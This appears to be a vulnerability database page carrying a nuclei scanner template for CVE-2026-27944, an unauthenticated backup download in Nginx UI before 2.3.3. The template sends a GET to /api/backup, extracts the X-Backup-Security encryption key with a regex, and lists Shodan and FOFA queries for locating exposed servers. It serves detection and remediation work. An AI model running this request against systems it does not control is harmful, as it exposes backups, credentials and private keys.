Lucene search
K

Nginx UI < 2.3.3 - Information Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Nginx UI <2.3.3 leaks encryption keys via unauthenticated /api/backup.

Related
Refs
Code
id: CVE-2026-27944

info:
  name: Nginx UI < 2.3.3 - Information Disclosure
  author: omarkurt
  severity: critical
  description: |
    Nginx UI < 2.3.3 contains an information disclosure vulnerability caused by unauthenticated access to /api/backup endpoint exposing encryption keys in X-Backup-Security header, letting unauthenticated attackers download and decrypt full system backups.
  impact: |
    Unauthenticated attackers can access and decrypt full system backups, exposing sensitive data including credentials and private keys.
  remediation: |
    Upgrade to version 2.3.3 or later.
  reference:
    - https://github.com/advisories/GHSA-g9w5-qffc-6762
    - https://www.tenable.com/security/research/tra-2026-17
    - https://vulnerabletarget.com/VT-2026-27944
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-27944
    epss-score: 0.22162
    epss-percentile: 0.9738
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: 0xjacky
    product: nginx-ui
    shodan-query: http.title:"nginx ui"
    fofa-query: title="nginx ui"
  tags: cve,cve2026,nginx-ui,unauth,exposure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/backup"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "X-Backup-Security"
          - "application/zip"
        condition: and

      - type: word
        part: header
        words:
          - "attachment; filename="

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        group: 1
        name: backup_security_header
        regex:
          - "X-Backup-Security: (.+)"
# digest: 490a004630440220589c237f07241273986eed4992bd189b35955ab31e7a7b40d4e95aefbd0c0352022038ee06b612f2f6e65433fa1d5f04da253111d2ce0d33ac5750a74b89f5ddcb4c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Mar 2026 20:48Current
7.1High risk
Vulners AI Score7.1
CVSS 3.19.8
EPSS0.22162
SSVC
31